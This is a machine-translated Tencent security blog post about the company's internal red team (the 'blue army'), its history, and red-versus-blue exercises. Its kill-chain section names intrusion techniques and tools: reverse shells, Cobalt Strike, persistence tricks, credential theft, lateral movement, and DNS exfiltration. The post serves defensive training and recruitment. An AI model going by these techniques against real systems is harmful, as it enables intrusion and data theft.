Author: [TSRC & Tencent Blue Army] mark4z5 (junior 5)
In April 2017, shadow brokers, a hacker organization, released a batch of NSA's cyber vulnerability Arsenal. Against the back of the country, NSA has a strong ability to exploit and exploit the universal 0day vulnerability. Where to hit these vulnerability databases is the nuclear weapon in the arsenal, including the windows Eternal Blue vulnerability exploitation tool. The leakage of the Arsenal also resulted in the civilian use of nuclear weapons, which were used by the Mafia to spread the blackmail worm virus. Remember wanna cry's rampage? Millions of computers around the world, including large enterprises and government agencies, have been attacked, and their power can be seen.
This is just one of the countless attacks.
When people enjoy the convenience brought by the development of network technology, they seldom realize the sword of Damocles - security. The endless loopholes are becoming more and more diversified. This sword is hanging over our heads. There is no protection means to defeat the enemy once and for all. Any carelessness may provide opportunities for hackers.
However, at the level of a single enterprise, its own safety accidents are relatively low frequency, and there is little direct perception at the business level. No accident has occurred, or the attack has not directly caused losses, which is likely to give people the illusion that the security protection is perfect enough, the business data is safe enough, and even lead to the backward protection means, the security process is more and more old, and the awareness of personnel is increasingly slack.
When the sword really falls, it will be too late.
This also explains why in recent years, global security accidents occur frequently, and both domestic and foreign countries attach great importance to network security. As the state put forward, there is no national security without network security. Network security and informatization are important strategic issues related to national security and national development, and the work and life of the masses of the people. They are the key to building China from a big country of network to a powerful country of network.
But not all vulnerabilities can be detected by automated tools. Therefore, both at home and abroad are in full swing to carry out the national network security practice. China's Ministry of public security organized the network protection action to gather national excellent penetration test engineers to carry out risk controlled attack drills, and the U.S. Department of Homeland Security organized cyber storm to carry out cyber security practice drills every two years.
From big to strong, the practice of network security is essential. It is the touchstone and combustion supporting device of network security construction, and the place to test the safety protection level of enterprises. Only by continuously exposing the defects of network security protection, monitoring and emergency response and optimizing the improvement, can we resist the violent attack of hackers.
So the question is, who will lead the "trial road"?
For Tencent, a company with huge volume, various businesses and massive data assets, it needs an internal attack team that not only understands the company's business, but also continuously penetrates the company's assets from the perspective of hackers. Only in this way can Tencent be more easily aware of the company's various security risks and eliminate the risks before they sprout.
Tencent blue army came into being.
The concept of blue army has existed in the military field for a long time.
The domestic blue army plays the role of imaginary enemy (i.e. enemy forces) and carries out actual combat exercises with the Red Army (our positive forces), so as to help the Red Army to check the deficiencies and make up for the deficiencies and improve its combat capability. The concept of network security red blue confrontation is also derived from this, and the security robustness and threat monitoring and response ability of enterprises are comprehensively tested by conducting apt advanced persistent threat attack drill.
The Red Army, as the defensive side of the enterprise, ensures the safety of the enterprise by means of security reinforcement, attack monitoring, emergency response and other means, while the blue army, as the attacking side, aims to find security loopholes, obtain business authority or data, and tries to bypass the Red Army's layers of defense by various means to achieve the established goal. It should be noted that in Europe and the United States, the red team represents the attacker, the blue team represents the defender, and the color represents the opposite, which is often confusing.
The work content of the enterprise network blue army mainly includes "penetration testing" and "red teaming". In fact, the attack technologies used are very similar, and the main differences are the focus. Penetration testing focuses on mining as many security vulnerabilities as possible in a short time. Generally, it doesn't pay much attention to whether the attack behavior is detected by monitoring, and even if it is found, it will not be intercepted immediately. The purpose is to help business systems expose and converge more risks. On the contrary, red blue confrontation usually adopts back-to-back approach to the real attack, focusing on bypassing the defense system, achieving the goal of obtaining business authority or data without any sound, and not finding all risk points, because the more attack actions are found, the greater the probability of being found, once found, the red army will kick the blue army out of the battlefield, so as to test the defense in depth ability and alarm in the real attack Operation quality and emergency response capability, of course, security loopholes of business system will be found in the process.
Tencent blue force was established in 2006 by Tencent TEG Security Platform Department. At that time, the ability of automatic vulnerability detection was relatively weak, and more security vulnerabilities had to be discovered by human flesh. In this context, Tencent blue army was officially established, and since then, it has been reported frequently. For more than ten years, it has focused on the research of cutting-edge security attack and defense technology, actual combat exercise, penetration test, security assessment, training and empowerment, etc., and used the perspective of attackers to carry out actual combat exercises in the real network environment to test security The adequacy and effectiveness of protection strategies and response mechanisms, and promote optimization and improvement.
It can be seen that when we talk about the blue army, what we are talking about is not just a simple simulation of hackers, but a thorough planning, careful investigation, careful design, and targeted defense suggestions.
To understand the whole attack life cycle of the blue army, we can do it through the network attack and kill chain: first, we can obtain a foothold through various means, on this basis, we can expand the control power through authority promotion, information discovery and horizontal movement, and finally achieve the purpose of data collection, theft and usurpation.
The following is a brief analysis of Tencent blue army's attack techniques and techniques in various stages based on its more than ten years' experience in attack and defense practice:
Target investigation: a series of investigation means are used to obtain the target's assets, personnel, environment and other information to provide basic information support for the implementation of the attack. The comprehensiveness and accuracy of the information largely determine the path, results and efficiency of the attack. For example, obtain domain name asset information through DNS domain transmission vulnerability, domain name registration information anti check, domain name enumeration and other means, obtain IP asset information through domain name resolution, network segment scanning and other means, obtain program fingerprint information through website scanning, port detection and other means, obtain groups through search engine, social networking site, online disk, GitHub and other platforms, and social worker deception and other means Information such as organizational structure, employee information, source code, account password, commonly used software, frequent website, security protection strategy, outsourcing service provider, etc. can be obtained through on-the-spot investigation on the network, access control, office and other environmental information of workplace and computer room.
Weapon Construction: according to the information collected in the early stage, make targeted attack code. If we try to attack HR, we can design resume documents implanted in Trojan horse. If we plan to start with online services, we can detect the vulnerability of target assets through automatic scanning, manual testing and other means to find the exploitable 0day vulnerability. In the current open apt cases, at least 80% of them start from attacking employees' office computers, because people are the biggest loophole in the system, and the attack success rate of using social engineering is high. At the same time, it is easier to find out the internal network and expand the scope of control after attacking employees' computers.
Attack delivery: deliver the attack load to the target by various means. For example, using the loopholes of command injection, file upload, SQL injection, SSRF, XSS, overflow, etc. to directly attack online services, using mail phishing, U-disk ferry attack, water pit attack, software and hardware supply chain attack, network hijacking and other ways to invade servers, employee computers, network equipment.
Execution utilization: different execution modes are adopted in different environments. In the limited environment, malicious code can be loaded by using system components or legal programs, so as to break through the system restrictions or hide itself and achieve the goal of smooth operation of Trojan horse. For example, in the windows environment, the system built-in program PowerShell is used to execute scripts. The malicious code only exists in memory, and the file does not land. There are many similar execution methods that can be used.
Command control: establish channels with various levels of concealment to control the target equipment or enter the target intranet. For example, through webshell (e.g. Caidao, weekly), reverse shell (e.g. bash / Python / PowerShell), remote control Trojan rat (e.g. cobalt strike / Metasploit meterprer), remote desktop access software (e.g. TeamViewer / VNC), multi-layer agent, transport encryption, port reuse, domain are used Fronting and other methods, using TCP / UDP / HTTP / HTTPS / DNS / ICMP / SMTP and other network protocols, and even imitating other normal application traffic to achieve real-time monitoring and remote control of the target device; through port forwarding (such as Netsh / iptables), socks agent (such as ssh-d), httptunnel (such as regorg), enterprise VPN channel and other ways to penetrate the enterprise intranet, breaking through the network boundary.
Defense and avoidance: use detection and countermeasure technology, attack trace clearing and other ways to avoid the discovery and tracing of security systems such as intrusion detection and anti-virus software. For example, using broilers to launch attacks to avoid exposing the real IP address of hackers, constructing malformed request packets to bypass WAF, injecting malicious code into normal legal processes / files, using white list, anti debugging, no file and other means to bypass virus detection (such as using legitimate digital certificates of well-known enterprises to sign malicious programs), clearing or destroying application access / system login operation logs, and reducing behaviors Frequency of activities, etc.
Authority maintenance: realize long-term control by hijacking legal programs, residing in the system's self starting back door, creating a hidden administrator account, etc., even if the system restarts or reloads. For example, replacing system auxiliary functions (such as magnifying glass, soft keyboard), hijacking dynamic connection library, using Windows service startup item / Linux timing task crontab configuration to start with the system, setting suid privilege program, installing bootkit Trojan, stealing original legal account password, etc.
Authority promotion: use system weakness or improper configuration to obtain super administrator level authority. For example, taking advantage of the latest Windows / Linux kernel privilege raising vulnerability, the third-party software running with administrator privilege can be exploited, the program file executed regularly with administrator privilege can be tampered with by ordinary users due to improper privilege setting, and the administrator password can be stored in the ordinary file of server at will, etc.
Information discovery: confirm the data that can be acquired or controlled through local search, intranet scanning and sniffing, and further understand the internal network and possible risk points. For example, the user list, process list, network connection, configuration file, program code, database content, operation and maintenance record, system account password, browser save password, mail content and other information can be obtained through the local bin flipping; the user credentials can be obtained through memory export, keyboard record and network sniffing; the enterprise can be analyzed by querying all accounts and hosts in Windows domain Complete organization / personnel, important machines and other information; describe the intranet topology, intranet application services and possible risk points through intranet host survival detection and remote service detection; obtain business architecture, code, server and other information by visiting the internal OA website, especially the knowledge sharing platform.
Horizontal movement: obtain more server permissions and data through intranet penetration attack. Generally speaking, hackers prefer to attack systems with enterprise network, machine and data related management authority, such as Windows domain control, patch server, mailbox system, internal instant messaging tool, springboard machine, operation and maintenance platform, password system, code management platform, etc. the truth is very simple. Once these systems are broken, almost all machines can be controlled, and then the target can be obtained Business data: hackers also like to attack the computers of corporate executives, targeted business employees and network administrators, because the information they hold is more important and closer to the purpose of hackers. One of the common internal network penetration ideas is that most enterprises have insufficient internal network isolation fineness (especially large enterprises have too many servers and high isolation cost), low internal network site security (focus on external attack prevention, less internal system security investment), and no authentication for high-risk application services of the internal network (such as docker / kubernetes / redis / Hadoop, etc.) In the case of authentication, the server can be directly controlled by intrusion. Many people think that the intranet is very secure, so authentication is not enabled. The server account password is generally common (for the convenience of management, even all server passwords are the same). These situations can make hackers easily obtain the control authority of some servers when the intranet is penetrated, and then log in to the server one by one to catch users Login credentials (one server has multiple accounts), and then use these credentials to try to log in to other servers. If the login succeeds and continues to grasp the login credentials of other users, the newly acquired credentials may log in to other servers. Through the classic way of repeatedly trying to log in and seize credentials, gradually expand the scope of server control, and finally may even achieve full access Program logs in to any server with legal user credentials, just like the operation and maintenance administrator logs in normally for operation and maintenance.
Data collection: collect attack target data such as source code, database, asset information, technical scheme, trade secret, email content, etc.
Data stealing: encrypting, compressing and segmenting the data, and transmitting the data to the hackers through HTTP (s) / ftp / DNS / SMTP and other network protocols, using the web to provide external access and download, physical U disk copy, or direct query and echo of the business interface.
Tampering and destruction: illegal profit by modifying data, retaliation by destroying data, etc.
There are many specific attack methods, not every attack will involve all aspects. For example, the purpose of attack is to obtain data of a system. If there is SQL injection vulnerability in the system itself, the purpose can be achieved by using SQL injection vulnerability to obtain data directly from the external network. Without considering so many complex attack techniques, hackers will launch the best means according to the purpose and status quo, rather than blindly carry out.
The same is true for safety drills, which are carried out according to the demands and purposes of the drills. The attack matrix of mitre att & CK is a knowledge base of sorting out attack tactics, technologies and processes based on the real invasion events of global apt organizations, which is of great reference value. However, some operation examples are not detailed enough, we have refined and expanded them, and will continue to share them in the future.
The ancients said that the paper must be finally shallow, and they must do it. The above details the killing chain of network attack. Tencent blue army has been in the army for more than ten years, which is a process from theory to practice, from paper to practice.
Since becoming a military force in 2006, we have conducted penetration tests on QQ, QQ space, wechat, payment, small programs, Tencent cloud, games and other important businesses, and found and eliminated a large number of potential security risks. Last year, the company vigorously promoted the self-study business to go to the cloud, and the Security Platform Department provided a complete set of security solutions and services such as security specifications, security protection, security assessment, security intelligence, security detection, etc. for the self-study business to go to the cloud. The blue army also kept pace with the development, focusing on the penetration test of multiple Tencent cloud basic components to improve the overall security of Tencent cloud.
In 2008, Tencent's independently developed server security system (Code: "onion") was officially launched, and the blue army launched the apt red blue confrontation drill, which is carried out dozens of times a year to continuously improve the detection ability. The apt red blue confrontation drill is divided into two modes. One is reverse verification of strategy scenarios, focusing on the test of the coverage and effectiveness of the strategy. The blue army combs all kinds of attack scenarios as comprehensive as possible, including the technologies that have been open on the Internet and have been researched by itself, conducting batch drills in the test environment from time to time, and conducting surprise drills in the production environment. The other is a complete attack drill aiming at acquiring the server or data control authority, focusing on the inspection of in-depth detection ability, alarm operation quality, emergency response ability and business security status in real attacks. The external network security protection of important business is often strong, and the difficulty of direct attack is great. Some businesses with less security investment and people with weak security awareness have become the breakthrough of hackers. First, they hack into the internal network, then penetrate the internal network, and indirectly attack important business. The blue army has been infiltrating important business and infrastructure for many times to help improve the security protection ability and attack detection ability of the intranet. Business spies / insiders often have some legal rights naturally, and they may know some security detection strategies after a long time of incubation, so these are also the roles played by the blue army to help companies enhance their monitoring and auditing capabilities.
In 2015, the blue army and the DDoS protection team ("Aegis") jointly and comprehensively combed the DDoS protection algorithm coverage scenarios, carried out multiple DDoS attack exercises and tests on aegis, and found a number of protection algorithm defects. After that, combined with the business scenarios and industry development targeted coordination and optimization, the service quality of aegis was significantly improved.
In 2016, the blue army set foot in risk control security, launched many red blue confrontations on Tencent's front-end risk control security, provided a lot of optimization suggestions and directions, and helped to improve and build the risk control capability based on the front-end (Tencent waterproof wall to understand).
In 2018, the blue army formally empowered the outside world. At the request of digital Guangdong and Tencent cloud, the blue army carried out a red blue confrontation exercise against digital Guangdong. The blue army launched attacks from the aspects of remote penetration of Internet sites, employees' phishing email attacks, and physical attacks when they arrived at the office to find multiple security risks, helping digital Guangdong improve its security reinforcement and protection capabilities. At the same time, in the Guiyang big data and network security attack and defense drill organized by the Ministry of public security last year, the blue army joint team composed of digital Guangdong security, Tencent cloud security, Cohen, Tencent it and Anping gained the highest score in attack and defense by virtue of their offensive and defensive ability. The defense guarantee target has not been broken until the end of the drill, and has become the only red target that has not been broken And won the first prize of technological innovation.
After years of intense red blue confrontation exercises, red and blue are chasing each other and promoting each other. The company's security protection system has been greatly improved. The technical capabilities of server security system ("onion"), DDoS protection system ("Aegis"), web application firewall ("doorman"), web vulnerability detection system ("Dongxi") and other company's security systems have achieved good results Ascension. Under the strategy of Tencent's industrial internet war, these systems are also settling and summing up, outputting more than ten years' security accumulation to third-party users, such as Dayu DDoS protection product jointly built by Tencent cloud security team, insight product of escorting "a mobile phone traveling in Yunnan", Tencent cloud red and blue confrontation expert service, etc., such as detecting "onion" covering all links of the network attack kill chain ”It has also launched product versions.
In addition, Tencent Security Emergency Response Center (TSRC), established in 2012, encourages us to work together with us on the premise of safety and reliability with the help of external security researchers / intelligence agents, and finds out potential security risks and protection defects of Tencent's external network business. So far, tens of thousands of people at home and abroad have participated, which can be considered as an extension of Tencent's blue army. Thank you very much for your help here.
Warmly welcome all penetration test / red blue confrontation experts to send their resumes to join us, or become Tencent's security white hat, and guard the security of hundreds of millions of users with us.
The essence of network security is confrontation, and the essence of confrontation is to compete the capabilities of both sides of attack and defense, but attack and defense are always unequal. The advantage of the attacker is far greater than that of the defender. The existence of the blue army is to help eliminate the inequality. First of all, compared with national apt organizations, the blue army of enterprise network has a great disparity in human, material, financial and other resources investment. It is very challenging for the blue army to continuously and timely master the latest apt attack technology. Secondly, there are many attack scenarios and strong business demand, so there are many drills to be carried out, and it is also a challenge for the blue army with limited manpower to complete its mission efficiently.
It is believed that in the future, more enterprises will build the network blue army, invest more resources to research the cutting-edge apt attack technology, and build a more intelligent blue army automatic attack platform to improve the exercise efficiency. We will also share the technical experience, attack and defense thinking in the actual combat exercise for the first time. Please pay attention to the official website of Tencent blue army https://force.tencent.com/.
We are TSRC
The guardian of Internet Security
The protector of user data security
We're looking for leaks, we're looking for intrusions, we're looking for attacks
Join hands with security industry elites to build Internet Ecological Security
Looking forward to the positive energy of your alliance with us!
Micro signal: TSRC team